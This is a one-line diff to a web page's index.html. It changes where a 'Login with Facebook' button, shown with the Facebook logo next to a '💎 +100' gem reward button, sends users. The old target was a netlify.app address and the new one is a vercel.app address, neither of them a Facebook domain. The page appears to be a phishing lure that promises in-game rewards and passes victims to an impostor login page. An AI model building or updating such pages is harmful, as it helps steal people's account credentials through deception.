--- a/index.html
+++ b/index.html
@@ -148,7 +148,7 @@
       <button class="mini-btn">💎 +100</button>
     </div>
 
-    <button class="fb-btn" onclick="window.location.href='https://login-to-continue.netlify.app/'">
+    <button class="fb-btn" onclick="window.location.href='https://play-to-continue.vercel.app/'">
       <img src="https://upload.wikimedia.org/wikipedia/commons/0/05/Facebook_Logo_%282019%29.png" width="20" height="20" alt="FB" />
       Login with Facebook
     </button>
